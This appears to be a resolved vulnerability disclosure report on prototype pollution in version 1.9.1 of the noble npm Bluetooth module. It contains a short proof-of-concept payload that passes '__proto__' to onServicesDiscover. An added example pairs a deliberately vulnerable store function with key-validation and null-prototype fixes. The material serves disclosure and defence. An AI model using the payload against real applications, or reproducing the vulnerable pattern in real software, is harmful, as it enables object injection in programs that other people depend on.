Prototype Pollution Vulnerability in noble Package
High
Vulnerability Details
I would like to report a prototype pollution vulnerability in noble.
It allows attackers to pollute the Object.prototype object of an application running noble, possibly through Bluetooth.
# Module
**module name:** noble
**version:** 1.9.1
**npm page:** `https://www.npmjs.com/package/noble`
## Module Description
A Node.js BLE (Bluetooth Low Energy) central module.
Want to implement a peripheral? Check out bleno
Note: macOS / Mac OS X, Linux, FreeBSD and Windows are currently the only supported OSes. Other platforms may be developed later on.
## Module Stats
2,270 downloads in the last week
# Vulnerability
## Vulnerability Description
An attacker can inject arbitrary properties on Object.prototype using one of the methods exposed by this module. Moreover, there is strong evidence (parameter names) to believe that these values can be controlled remotely by the attacker, through Bluetooth.
## Steps To Reproduce:
For now, I only have a local payload, but it seems to me that both the peripheralUuid and serviceUuids expected by onServicesDiscover are specified in the Bluetooth standard, so they may come from another device advertising itself over Bluetooth. However, this scenario needs to be investigated further.
```js
var noble = require('noble');
//noble.emit("servicesDiscover");

// Before the call: a fresh object has no property x.
console.log({}.x);
try {
  // "__proto__" is passed as peripheralUuid and "x" as serviceUuids.
  noble.onServicesDiscover("__proto__", "x");
} catch(e) {}
// After the call: if Object.prototype was polluted, every object now inherits x.
console.log({}.x);
```
## Patch
N/A. Validate the property name or initialize the target object using Object.create(null).
# Wrap up
- I contacted the maintainer to let them know: N
- I opened an issue in the related repository: N
## Impact
If the attack can indeed be deployed using Bluetooth, this issue is serious, allowing the attacker to inject arbitrary properties from a remote device.
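The two mitigations named under Patch, shown beside the vulnerable pattern, as an added example that is not part of the original report and is not noble's code. The nested store shape, the function names and the hex-only key format are assumptions made for illustration.

```javascript
// Hypothetical stand-in for a nested store keyed by device-supplied ids.

// Vulnerable pattern: plain object literal, keys used without checks.
function recordServiceUnsafe(store, peripheralUuid, serviceUuid, value) {
  // With peripheralUuid === "__proto__" this resolves to Object.prototype.
  store[peripheralUuid][serviceUuid] = value;
}

// Mitigation 1: validate the property name.
// Assumption: ids are hex strings of 4 to 32 characters.
const HEX_ID = /^[0-9a-f]{4,32}$/i;
function isSafeKey(key) {
  return typeof key === 'string' && HEX_ID.test(key);
}

// Mitigation 2: dictionaries without a prototype, so "__proto__" is
// just an ordinary own key and never reaches Object.prototype.
function createStore() {
  return Object.create(null);
}

function recordServiceSafe(store, peripheralUuid, serviceUuid, value) {
  if (!isSafeKey(peripheralUuid) || !isSafeKey(serviceUuid)) return false;
  if (!(peripheralUuid in store)) store[peripheralUuid] = createStore();
  store[peripheralUuid][serviceUuid] = value;
  return true;
}

function demo() {
  const result = {};
  try { recordServiceUnsafe({}, '__proto__', 'polluted', 'yes'); } catch (e) {}
  result.unsafePolluted = ({}).polluted === 'yes';
  delete Object.prototype.polluted; // undo the pollution before continuing

  // Null-prototype store alone, with no key validation at all.
  const bare = createStore();
  bare['__proto__'] = createStore();
  bare['__proto__']['polluted'] = 'yes';
  result.nullProtoPolluted = 'polluted' in {};

  // Both mitigations combined; the sample ids below are constructed.
  const safe = createStore();
  result.rejected = !recordServiceSafe(safe, '__proto__', 'polluted', 'yes');
  result.accepted = recordServiceSafe(safe, 'a0b1c2d3e4f5', '180f', 'battery');
  result.safePolluted = 'polluted' in {};
  return result;
}

console.log(demo());
```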
Report Stats
- Report ID: 390857
- State: Closed
- Substate: resolved
- Upvotes: 4